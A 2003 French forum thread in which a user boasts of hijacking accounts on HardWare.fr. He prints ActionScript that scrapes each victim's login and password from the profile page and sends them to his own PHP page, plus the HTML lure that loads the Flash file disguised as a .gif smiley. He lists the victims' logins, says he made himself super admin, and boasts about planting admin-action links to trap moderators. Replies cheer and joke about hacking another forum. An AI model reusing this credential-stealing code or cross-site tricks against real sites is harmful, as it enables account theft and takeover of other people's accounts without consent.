Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1608 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  La faille des forums presence pc enfin dévoilée!

 


 Mot :   Pseudo :  
 
 Page :   1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17
Page Précédente
Auteur Sujet :

La faille des forums presence pc enfin dévoilée!

n°576130
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 22:46:28  profilanswer
 

je précise avant tout :
ce post est à carractère informatif, je dégage toute responsabilité dans le cas d'une utilisation méchante de ces infos :D

 
 
yo les moules :o  
 
 
bon je vais vous expliquer comment j'ai reussi à hacker le forum.. je sais, ça fait longtemps que vous attendez.. j'ai eu pleins de mp et tout.. bref..
 
vous allez voir, c'est tout bidon.
 
Bon tout a commencé en observant le code source html du forum..
 
hop je vous montre ce qui m'a un peu choqué :
 

<tr bgcolor="#C9DBED">  
   <td valign="top" width="1%"><b class="text2big">Nom d'utilisateur</b></td>
   <td valign="top">  
     <input maxlength="25" accesskey="p" size="25" name="pseudo" value="Mr yvele" />&nbsp;&nbsp; <a href="inscription.php3?interface=&amp;config=" class="text2small">Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !</a>
   </td>
 </tr>
 <tr bgcolor="#C9DBED" style="display: none" id="passf">  
  <td valign="top"><b class="text2big">Mot de passe :</b></td>
  <td valign="top">  
  <input type="password" maxlength="40" size="25" name="password" value="monpitipassword" />&nbsp;&nbsp; <a href="password.php3?interface=&amp;config=" class="text2small"><b>Vous avez perdu votre mot de passe ? Cliquez ici !</b></a>
  </td>
</tr>


 
oui, vous n'avez pas rêvé :
 
name="password" value="monpitipassword"
name="pseudo" value="Mr yvele"  
 
votre login et votre mot de passes étaient visibles dans le code source de la page [:mcwimpy4]  
donc n'importe quel gugus qui ouvre une page du forum avec les cookies d'un autre, peu connaitre son mot de passe sans problemes.. bref..
 
maintenant le but, c'est que je puisse connaitre le mot de passe du gars sans avoir besoin de me glisser devant son pc pendant qu'il va pisser un bol :o  
 
 
bref.. j'me suis dit comme ça que je pourrais, via une page hebergée chez moi, inclure la page profil de hrf, qui contient le mot de passe, dans une iframe.. puis, via un javascript (je crois.. je sais plus trop), recuperer le code source de cette fameuse iframe
Puis, enfin, l'envoyer via GET, vers une page php qui s'occuperait de stocker le bazard..
 
exemple :
 
Dans ma page hebergée par free:

<iframe src="http://forum.hardware.fr/profile.php3?config=&interface=">
</iframe>


 
mais bon, j'avais pas pensé à un truc, c'est que le cookie de hfr ne marche pas, vu qu'il est appellé indirectement pas une page située autre part que sur http://forum.hardware.fr et c'est la page mère qui compte pour l'ouverture du cookie.
 
 
conclusion :
il est impossible de lire la valeur d'un cookie depuis un site web si ce cookie a été placé depuis un autre site web. meme pas par appel indirecte..
(le web c'est de la qualitay! c'est bien fait quand meme! :D )
 
 
 
bref.. donc, il faut que le script éxécuté par la cible, soit télechargé à partir de http://forum.hardware.fr..
donc uploader chez hfr, un michant fichier..
 
et quel moyen permet d'uploader des fichiers sur leur serveur?
- les avatars
- les smileys perso
 
les avatars requierent une validation du modo.. donc ça pourrait pas marcher..
par contre le smiley perso, on pouvait faire comme on voulait.. :p  
 
donc j'ai fait un petit fichier swf (oui, flash :o )
avec ceci codé en actionscript :
 

Code :
  1. //chargement des variables
  2. phpvars = new LoadVars();
  3. phpvars.load("http://forum.hardware.fr/profile.php3?config=&interface=" );
  4. phpvars.onLoad = function()
  5. {
  6. if(getBytesLoaded >= getBytesTotal)
  7. {
  8.   str = phpvars.toString();
  9.  
  10.   debut = str.indexOf("value%3D%22",0)+11;
  11.   fin  = str.indexOf("%22%3E%0A",debut+1);
  12.   l  = str.slice(debut,fin);
  13.  
  14.   debut = str.indexOf("value%3D%22",fin)+10;
  15.   fin  = str.indexOf("%22%3E%0A",debut+1);
  16.   p  = str.slice(debut,fin);
  17.   tophp = new LoadVars();
  18.   tophp.a = l;
  19.   tophp.b = p;
  20.  
  21.   tophp.send("http://truc.free.fr/page.php" );
  22.   }
  23. }


 
bon, ça se passe de commentaires.. :o  
on récupère le contenu de http://forum.hardware.fr/profile.php3, on cherche les trucs qui nous interresse et on envoie tout via POST ou GET, vers un page php.. qui s'occupe de tout stocker! :o
 
bon cool ça marche!
j'essaye d'uploader le .swf.. ça passe pas :o  
je renome le .swf en .gif .... ça passe! :D  
 
voila.. il suffit plus que de faire une vieille page html qui pointe vers mon fichier flash camouflé! ;)  
 
hop :
 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width=80 height=50><param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
<param name=quality value=high>
<param name=bgcolor value=#FFFFFF>
</object>


 
maintenant j'utilise mon multi (le smiley perso à été uploadé chez lui bien sur, histoire qu'on sache pas que c'est moi)
je crée des topics bidon rameuteur de troupe chez mes copains de graphisme et programmation puis discussion aussi hein :D  
 
j'y poste mon liens, qui lui pointe vers le swf caché, qui lui meme pointe vers la page de profil et la page de sauvegarde  :sol:  
 
hop j'attend 10-15 min..
ouèèèè plein de blaireaux tombent dans le piège à loup
 
hop pou rle fun, la liste :
 


login: parappa
login: fondbleu  
login: nepheast  
login: Mr%20yvele  
login: Enzan  
login: moazaaa  
login: mattc  
login: pulpipi  
login: Miguelito%20Loveless  
login: darth21  
login: dago  
login: HFrBaXtER  
login: mareek  
login: atigrou  
login: Maraude  
login: kewuy  
login: Meganne  
login: pangolator  
login: The%20Beast  
 
login: rarules  
login: uriel  
login: uriel  
login: Burgergold  
login: uriel  
login: XP1700
[g]login: marc[/g]
login: mrbebert  
login: Autobot  
 
login: Autobot  
login: denis1  
login: simogeo  
login: Space  
login: DesuetCR%5FB  
login: suri  


 
yeah comme vous pouvez le voir, j'aivais le mot de passe de marc..
donc la possibilité de tout faire sur le forum..
y compris mettre "Mr yvele" en super admin! :sol:  
 
voici les screens :
http://iicrew.free.fr/hack%20hfr/
 
y a de tout.. [:sinclaire]  
 
voila..
 
 
 
donc 3 grandes failles béantes :
 
1) présence du password login dans la source html
2) mauvaise vérification du fichier image uploadé (utiliser exif_imagetype() en php)
3) smiley perso non controllé par les modos
 
 
 
Encore un truc à signaler.. à propos des urls foireuse..
genre poser une url cachée sur un topic, qui pointe vers une page du forum qui, par exemple efface tout les drapos, ou, met des gens en ignore list
 
exemple :
http://www.google.fr/
 
donc la, joce n'a rien fait pour parer ce tour de passe passe.. mais il y a des solutions (que j'ai soumis à joce, mais il veut rien entendre.. [:mmmfff])
genre genérer un muméro unique pour chaque forumeur, et le demander dans toutes ses urls (enfin juste les urls à rique, pas les viewtopic et compagnie)
 
du coup l'url pointant vers
http://forum.hardware.fr/suppressf [...] rid=564231
 
ne sera applicable que pour le forumeur ayant l'id 564231..
 
 
solution facile à mettre en place, pour eviter les pieges url de masse! [:sinclaire]  
 
(et puis je signale que j'ai toutes les urls de d'administration du forum.. et je pourrais donc les cacher en attendant qu'un modérateur maladroit clique dessus, puis effectue une action non souhaitée! [:power666] )
 
 
lol bon..
alors voila.. je vous avez dit que c'était tout bidon!  :)


---------------
yvele n'est plus.
mood
Publicité
Posté le 25-11-2003 à 22:46:28  profilanswer
 

n°576132
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 22:46:41  profilanswer
 

voila.. [:cupra]
 
c'est la que je me suis autodésigné comme super administrateur :
 
http://iicrew.free.fr/hack%20hfr/admin3.png
 
 :D
 
 
edit: et en plus HFR 6eme plus grand forum mondial!  [:extazaille]


Message édité par Mr yvele le 28-12-2003 à 21:21:30

---------------
yvele n'est plus.
n°576135
icewinddal​e
Posté le 25-11-2003 à 22:48:38  profilanswer
 

C'est tout ? c'est nul !


Message édité par icewinddale le 25-11-2003 à 22:48:47
n°576137
chrisbk
-
Posté le 25-11-2003 à 22:52:09  profilanswer
 

quel w4rl0rd

n°576138
drasche
Posté le 25-11-2003 à 22:52:34  profilanswer
 

roh le fou, ça donne des idées pour améliorer la sécu de mon futur forum ça :D
 
je t'engagerai comme betatesteur le moment venu :ange:


---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
n°576140
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 22:52:35  profilanswer
 

j'ai hésité à le mettre dans html :o


---------------
yvele n'est plus.
n°576141
Loom the G​loom
Even coders get the blues...
Posté le 25-11-2003 à 22:53:32  profilanswer
 

c'est pas mal :jap:


---------------
Music|Market|Feed|Loom|DVD
n°576143
Mad_Overcl​ocker
S=C³A/4ħG ? Ask Datoune
Posté le 25-11-2003 à 22:54:30  profilanswer
 

[:romf]  [:zytra]


---------------
RTCW & W:ET PlayerDawa Pack 1.28ハイテクなマスター
n°576145
*syl*
--&gt; []
Posté le 25-11-2003 à 22:55:42  profilanswer
 

Bien joué le coup du swf :)

n°576147
the real m​oins moins
Posté le 25-11-2003 à 22:57:08  profilanswer
 

j'ai pas compris à quoi servait la page html ou le faux smiley
(un, oui, mais pas les deux)
et je suis surpris que flash gere les cookies du browser!?


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
mood
Publicité
Posté le 25-11-2003 à 22:57:08  profilanswer
 

n°576148
chrisbk
-
Posté le 25-11-2003 à 22:57:21  profilanswer
 

putain on pourra plus se foutre de son actionscript a la con [:sisicaivrai]

n°576149
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 22:57:57  profilanswer
 

ben faut bien que le faux smiley soit exécuté par flash.. faut bien l'appeller..  [:sinclaire]
 
si il est pas exécuté par un client (forumeur), il fait rien hein..


Message édité par Mr yvele le 25-11-2003 à 22:58:40

---------------
yvele n'est plus.
n°576150
the real m​oins moins
Posté le 25-11-2003 à 22:58:38  profilanswer
 

haaaa oook j'y suis..


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
n°576151
Loom the G​loom
Even coders get the blues...
Posté le 25-11-2003 à 22:58:50  profilanswer
 

en fait je me rends compte que j'ai pas tout compris [:meganne]


---------------
Music|Market|Feed|Loom|DVD
n°576152
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 22:59:30  profilanswer
 

quoi? [:meganne]


---------------
yvele n'est plus.
n°576153
gm_superst​ar
Appelez-moi Super
Posté le 25-11-2003 à 22:59:39  profilanswer
 
n°576154
the real m​oins moins
Posté le 25-11-2003 à 23:00:05  profilanswer
 

the real moins moins a écrit :


et je suis surpris que flash gere les cookies du browser!?


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
n°576155
orazur
Posté le 25-11-2003 à 23:00:15  profilanswer
 

impressionant javoue

n°576158
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:01:13  profilanswer
 

ça va donner de mauvaises idées... pleins de forumphpbb proposent d'uploader du flash sur le serveur.. :/
 
au lieu de recuperer le source, on pourrait attaquer directement le cookie.. bref.. jsuis trop paresseux pour essayer :o
 
 
edit: en tout cas faut faire circuler l'info rapidement apres des webmaster de forum [:sinclaire]


Message édité par Mr yvele le 25-11-2003 à 23:02:01

---------------
yvele n'est plus.
n°576159
gm_superst​ar
Appelez-moi Super
Posté le 25-11-2003 à 23:02:00  profilanswer
 

Mr yvele a écrit :

ben faut bien que le faux smiley soit exécuté par flash.. faut bien l'appeller..  [:sinclaire]
 
si il est pas exécuté par un client (forumeur), il fait rien hein..


Donc si je comprend bien ton .swf était en fait un .gif, que le forum met dans un tag <img>. Ce qui signifie donc que certains browsers appellent le plugin Flash à partir d'un tag <img> ???


---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
n°576160
skeye
Posté le 25-11-2003 à 23:02:34  profilanswer
 

[:cupra]


---------------
Can't buy what I want because it's free -
n°576162
Loom the G​loom
Even coders get the blues...
Posté le 25-11-2003 à 23:03:43  profilanswer
 

ben y'a des étapes que j'ai pas compris en fait...
une petite récap rapide étape par étape ? [:cupra]


---------------
Music|Market|Feed|Loom|DVD
n°576163
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:03:49  profilanswer
 

gm_superstar a écrit :


Donc si je comprend bien ton .swf était en fait un .gif, que le forum met dans un tag <img>. Ce qui signifie donc que certains browsers appellent le plugin Flash à partir d'un tag <img> ???


 
nan c'est le contraire.. c'est un flash renomé en .swf..
 
apres j'ai une page perso comme ça :

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width=80 height=50>
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
<param name=quality value=high>
<param name=bgcolor value=#FFFFFF>
</object>


 
qui, une fois appellée par le forumeur cible, lance mon faux smiley avec marcomdei flash player :)
 
 
regarde la :
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
 


Message édité par Mr yvele le 25-11-2003 à 23:05:27

---------------
yvele n'est plus.
n°576166
MossieurPr​opre
I d͟o̩n᷃'̵t͖ give a shit
Posté le 25-11-2003 à 23:06:02  profilanswer
 

[:wam]


---------------
www.novemberguitars.com
n°576169
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 25-11-2003 à 23:07:54  profilanswer
 

bon maintenant faut s'amuser a trouver d'autre faille sur le forum de joce :evil:


Message édité par forummp3 le 25-11-2003 à 23:08:06

---------------
lecteur mp3 yvele's smilies jeux de fille
n°576173
drasche
Posté le 25-11-2003 à 23:09:43  profilanswer
 

forummp3 a écrit :

bon maintenant faut s'amuser a trouver d'autre faille sur le forum de joce :evil:


on pourrait essayer sur ton forum :o


---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
n°576175
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:09:54  profilanswer
 

Loom the gloom a écrit :

ben y'a des étapes que j'ai pas compris en fait...
une petite récap rapide étape par étape ? [:cupra]


 
okay...
 
 
en fait j'ai fait :
 
1 fichier flash renomé en .gif> que j'ai placé sur le serveur de hfr.. (via l'upload de smiley)
 
1 page html> qui demande à flash player d'ouvrir le fichier flash renomé en .gif, qui se trouve sur le serveur de hfr
 
1 page php> qui recupère le mot de passe et login envoyé par le fichier flash
 
 
 
1 page html> appelle 1 fichier flash renomé en .gif> qui lui, appelle 1 page php>


---------------
yvele n'est plus.
n°576178
gm_superst​ar
Appelez-moi Super
Posté le 25-11-2003 à 23:10:42  profilanswer
 

Mr yvele a écrit :

qui, une fois appellée par le forumeur cible, lance mon faux smiley avec marcomdei flash player :)
 
 
regarde la :
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>


Ah ouais OK. C'est en fait le plugin Flash qui est pourryte et qui ne vérifie pas l'extension et/ou le type MIME du fichier en paramètre.
 
Bien joué :jap:
 
Edit: enfin le plugin Flash est pourryte mais c'est surtout le forum  qui a (eu) des problèmes :o


Message édité par gm_superstar le 25-11-2003 à 23:11:53

---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
n°576180
Loom the G​loom
Even coders get the blues...
Posté le 25-11-2003 à 23:11:42  profilanswer
 

ok, c'est mieux, je ne saisis juste pas le lien entre le fichier gif et les mots de passe et login...


---------------
Music|Market|Feed|Loom|DVD
n°576181
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 25-11-2003 à 23:11:45  profilanswer
 

drasche a écrit :


on pourrait essayer sur ton forum :o

oui oui, j'attend :evil:
 
1er défi: pouvoir acceder à la cat 0 :o


---------------
lecteur mp3 yvele's smilies jeux de fille
n°576182
gm_superst​ar
Appelez-moi Super
Posté le 25-11-2003 à 23:12:58  profilanswer
 

Loom the gloom a écrit :

ok, c'est mieux, je ne saisis juste pas le lien entre le fichier gif et les mots de passe et login...


Comme tu l'as dit, actionscript permet d'accéder aux cookies à partir du moment où le script provient du même domaine que les cookies [:spamafote]
 
Ah non j'ai rien dit il parse la page du profil


Message édité par gm_superstar le 25-11-2003 à 23:15:42

---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
n°576183
MossieurPr​opre
I d͟o̩n᷃'̵t͖ give a shit
Posté le 25-11-2003 à 23:13:28  profilanswer
 

pourquoi les screens datent de juin ?


---------------
www.novemberguitars.com
n°576184
Harkonnen
Modérateur
Un modo pour les bannir tous
Posté le 25-11-2003 à 23:13:41  profilanswer
 

j'ai rien compris à tout ce merdier web à la con mais bravo


---------------
J'ai un string dans l'array (Paris Hilton)
n°576185
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:13:44  profilanswer
 

forummp3 a écrit :

oui oui, j'attend :evil:


 
tu permets pas l'uload! alors forcement tu te mouilles pas trop  :o  
 
 
essayez de hacker mes fichiers html :o  :o  
 
 :D


---------------
yvele n'est plus.
n°576186
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:14:10  profilanswer
 

MossieurPropre a écrit :

pourquoi les screens datent de juin ?


 
parce que ça date de juin  :D


---------------
yvele n'est plus.
n°576187
xam_orpheu​s
Posté le 25-11-2003 à 23:14:54  profilanswer
 

En tout cas c'est vieux, la faille a été corrigée depuis non ? Parce que je viens de vérifier, mon mdp est encodé dans le profile.php3.

n°576188
orazur
Posté le 25-11-2003 à 23:16:32  profilanswer
 

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D

n°576189
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:16:33  profilanswer
 

oui bien sur, en fait j'ai prevenu joce (le créateur du forum) tout de suite apres le hack...
 
il a réparé toutes ces failles.. et m'a demandé de ne rien dire à personne..
mais bon, la c'est abusé, ça va faire bientot 6 mois..  [:sinclaire]  
 
 
faut que le peuple sache tout! :o


---------------
yvele n'est plus.
n°576190
Mr yvele
yvele n'est plus.
Posté le 25-11-2003 à 23:17:31  profilanswer
 

orazur a écrit :

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D


 
forummp3> [:forummp3]


---------------
yvele n'est plus.
n°576191
chrisbk
-
Posté le 25-11-2003 à 23:18:15  profilanswer
 

orazur a écrit :

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D


 
ca c'est du hack de haut vol [:le kneu]

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17
Page Précédente

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  La faille des forums presence pc enfin dévoilée!

 

Sujets relatifs
[Linux] Tester la presence d'un fichierVérifier la présence d'un cookie dans une page appelée par un include.
[Java] déterminer la présence de certains caractères dans un Stringregexp: recherche la présence de n mots dans une chaine
faille de sécurité dans mon script PhpWebGalleryHacking et faille de sécurité MySQL, aidez-moi à me protéger.
[Divers] C combien un forum Présence PC ?Recherche présence d'une variable
Certains Webmasters ont la tête dans les nuages... Faille inside[Java] Détecter la présence du JRE de Sun
Plus de sujets relatifs à : La faille des forums presence pc enfin dévoilée!


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR